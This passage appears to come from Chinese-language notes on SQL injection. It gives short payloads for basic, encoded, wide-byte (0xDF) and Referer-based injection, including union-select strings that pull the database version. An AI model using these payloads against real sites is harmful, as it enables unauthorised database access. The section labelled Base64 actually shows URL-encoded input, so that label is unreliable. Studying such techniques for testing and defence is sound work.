) VALUES(10,"cpul","mysql123");
基本注入: 该方式明显会被注入,没啥可说的。...id=1%E6%27 and 1=1 --+
Base64注入: 有些为了业务需要他会把传入一些编码后的参数再解码带入数据库查询,常见的有base64编码,也有的程序会内置url解码,通常见于框架....id=%2527union%20select%201,2,3,4,5--%20+
宽字节注入:
id=0%DF%27%20union%20select%201,version(),3,4,5%20%27
来路绕过实现注入: burp抓包改包,加上Referer: http://www.xxx.com...>
输入框中的注入:
<!